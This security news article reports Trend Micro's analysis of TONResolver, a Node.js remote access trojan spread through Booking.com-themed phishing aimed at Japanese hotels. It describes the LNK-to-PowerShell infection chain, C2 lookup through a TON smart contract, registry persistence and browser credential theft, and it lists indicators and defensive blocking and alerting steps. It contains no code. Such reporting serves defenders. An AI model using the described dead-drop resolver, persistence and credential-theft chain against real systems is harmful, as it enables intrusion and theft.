TONResolver Malware Uses TON Blockchain to Switch C2 Servers in Japan Hotel Phishing Campaign
A new malware campaign is targeting Japanese accommodation businesses with phishing emails that impersonate Booking.com-related guest complaints and review requests.
The malware, tracked as TONResolver, uses The Open Network blockchain to hide and update its command-and-control server address. According to Trend Micro’s report, attackers began sending the phishing emails in late May 2026 to Japanese partner companies that use Booking.com.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The main risk is not only the first infection. Once TONResolver runs on a victim’s system, it can keep a live connection with attacker infrastructure, send endpoint information, and wait for additional commands.
TONResolver turns blockchain into a C2 lookup system
TONResolver stands out because it does not store a fixed command-and-control domain inside the malware. Instead, it queries a TON smart contract through the TON API service and retrieves the current attacker-controlled server address from the blockchain.
This technique is known as a dead drop resolver. In simple terms, the malware checks an outside location for instructions on where to connect next. If defenders block one server, the attacker can update the smart contract and redirect infected machines to a new server.
The technique fits the broader MITRE ATT&CK Dynamic Resolution category, where attackers dynamically change command-and-control connection details to avoid detection and takedown.
How the phishing campaign works
The campaign starts with emails written to look like urgent hotel business messages. Some emails claim that a guest submitted a serious complaint. Others ask staff to review stay-related photos, videos, or attached evidence.
Trend Micro observed two main delivery methods. One used bulk phishing emails with Japanese-language subjects such as “Important: Guest Stay Review Request.” The other used a conversational approach through Gmail, where the attacker first sent a normal inquiry and delivered the malicious link only after the hotel replied.
This trust-building step makes the campaign harder for staff to spot. A hotel employee may expect follow-up messages from guests, especially when the topic involves complaints, reservations, or room availability.
| Stage | What happens | Why it matters |
|---|---|---|
| Phishing email | Attackers send Booking.com-themed complaint or inquiry messages | Hotel staff are pushed to click a link quickly |
| ZIP download | The link downloads an archive from attacker infrastructure | The malware arrives disguised as business-related material |
| LNK execution | A shortcut file disguised as a photo launches PowerShell | User execution starts the infection chain |
| PowerShell script | The script downloads and prepares the payload | The attack uses native Windows scripting to move forward |
| Node.js runtime | Node.js is downloaded and placed under the user profile | A legitimate runtime executes the malicious JavaScript file |
| TONResolver | The malware queries TON and connects to the retrieved C2 server | Attackers can switch infrastructure without changing the payload |
Node.js helps the malware blend in
The payload is a JavaScript file executed with Node.js. In observed samples, the malware retrieved Node.js version 24.13.0 from the official Node.js distribution path if node.exe was not already present.
The runtime and payload were placed under the user’s AppData folder. This helped the malware run without installing a traditional executable in a more obvious location.
TONResolver also uses VM-based obfuscation. Its logic is converted into a custom virtual instruction set, which makes static analysis harder and slows down detection engineering.
What TONResolver does after infection
After execution, TONResolver checks whether another copy is already running, sets persistence through the Windows registry Run key, then performs a connectivity check.
It then calls the TON smart contract through the TON API REST service using a method named get_domain. The returned value gives the malware the active command-and-control server.

After connecting, the malware uses encrypted WebSocket communication. Trend Micro reported the use of ECDH, HKDF-SHA256, and AES-256-CBC for its command-and-control traffic, making simple network string inspection less effective.
- Checks for duplicate execution through a mutex-style mechanism
- Sets persistence through HKCU registry Run keys
- Queries tonapi[.]io for the active C2 domain
- Sends endpoint data such as username, hostname, OS, CPU, memory, and MAC address
- Maintains a keepalive loop with the attacker-controlled server
- Supports follow-on command execution and payload delivery
Credential theft followed some infections
Trend Micro said the malware does not immediately steal files or credentials at the first stage. Instead, it appears to give attackers a foothold that can support later command execution.
Observed follow-on activity included attempts to steal credentials and browser data. The targets included Chrome and Edge passwords, cookies, history, and autofill content.
This matters for hotels because one infected front-desk or back-office machine can expose booking portals, email accounts, payment-related workflows, and partner systems. Credential theft can also let attackers return later through legitimate accounts.
Why the TON smart contract method is difficult to disrupt
Blocking one C2 domain may not end the infection. The attacker can write a new domain into the TON smart contract, and infected systems can retrieve the new destination during the next lookup.
That is why the campaign aligns with the dynamic resolution technique. The malware separates the payload from its current infrastructure, giving attackers more room to recover when defenders block domains.
Trend Micro’s blockchain analysis found multiple C2 domain changes written to the TON contract, including entries from February 2026 and June 2026. This shows the resolver mechanism was not only theoretical, but actively used.
| Indicator type | Indicator | Description |
|---|---|---|
| Detection name | TrojanSpy.JS.TONRESOLVER.A | Trend Micro detection for the JavaScript RAT payload |
| TON API domain | tonapi[.]io | Legitimate TON API service abused for C2 resolution |
| TON method | methods/get_domain | Smart contract method used to retrieve the active C2 domain |
| Resolver contract | 0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9 | TON contract used to store the C2 domain |
| Updater contract | 0:6d5b44d0678e6bd6703f2cabd2531ccf5a0b11cc081f8f7175bd679db4c12d41 | Attacker-controlled TON contract tied to C2 updates |
| Payload path | %USERPROFILE%\AppData\Local\Nodejs\{filename}.js | Location where the JavaScript payload is saved |
| Node.js path | %USERPROFILE%\AppData\Local\Nodejs\node-v24.13.0-win-x64\ | Directory used for the Node.js runtime |
| Persistence key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Registry location used to restart the malware |
Defenders should watch PowerShell, Node.js, and TON traffic
Hotels and managed IT providers supporting accommodation businesses should review endpoint telemetry for PowerShell downloading scripts from suspicious domains. They should also check for Node.js running from AppData paths rather than approved development folders.
The Trend Micro recommendations include restricting connectivity to TON services where they are not needed for business operations. Blocking tonapi[.]io can interrupt the resolver stage of this attack chain.

Security teams should also train hotel staff to treat complaint-themed emails with caution. Messages that ask staff to download photos, videos, or evidence through external links deserve extra review, even when they appear to concern a real reservation issue.
- Block or monitor access to tonapi[.]io where blockchain access is not required
- Restrict PowerShell from retrieving files from the internet
- Alert on node.exe running from AppData or temporary user folders
- Inspect LNK files delivered inside ZIP archives
- Review registry Run keys for suspicious JavaScript or Node.js execution
- Reset passwords and browser sessions on systems that show signs of compromise
- Monitor hotel booking, email, and payment-related accounts for suspicious logins
Japan’s hotel sector remains the primary target
The campaign currently centers on Japanese accommodation facilities, but the technique can spread to other regions and industries. Any organization that relies heavily on email-based customer communication could face similar lures.
TONResolver also shows how attackers can combine familiar phishing, legitimate runtimes, blockchain infrastructure, and encrypted communication into one infection chain. Each layer makes the activity harder to stop with a single control.
The practical response is clear. Organizations should reduce unnecessary blockchain access, harden script execution, monitor unusual Node.js behavior, and investigate any endpoint that recently opened suspicious guest complaint archives.
FAQ
TONResolver is a JavaScript-based remote access trojan that runs through Node.js. It uses a TON smart contract to retrieve its current command-and-control server address.
Trend Micro reported that the observed campaign targeted Japanese accommodation facilities that use Booking.com, mainly through phishing emails disguised as guest complaints, review requests, or hotel inquiries.
TONResolver queries a TON smart contract through tonapi.io and retrieves the active C2 domain from a method called get_domain. This lets attackers change the server address without changing the malware file.
The malware uses Node.js to execute its JavaScript payload. In observed attacks, the runtime was downloaded and stored under the user profile, which helped the payload run through a legitimate platform.
Organizations should restrict unnecessary access to TON services, block PowerShell from downloading external files where possible, monitor node.exe running from AppData, inspect LNK files in ZIP archives, and review registry Run keys for suspicious persistence.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
User forum
0 messages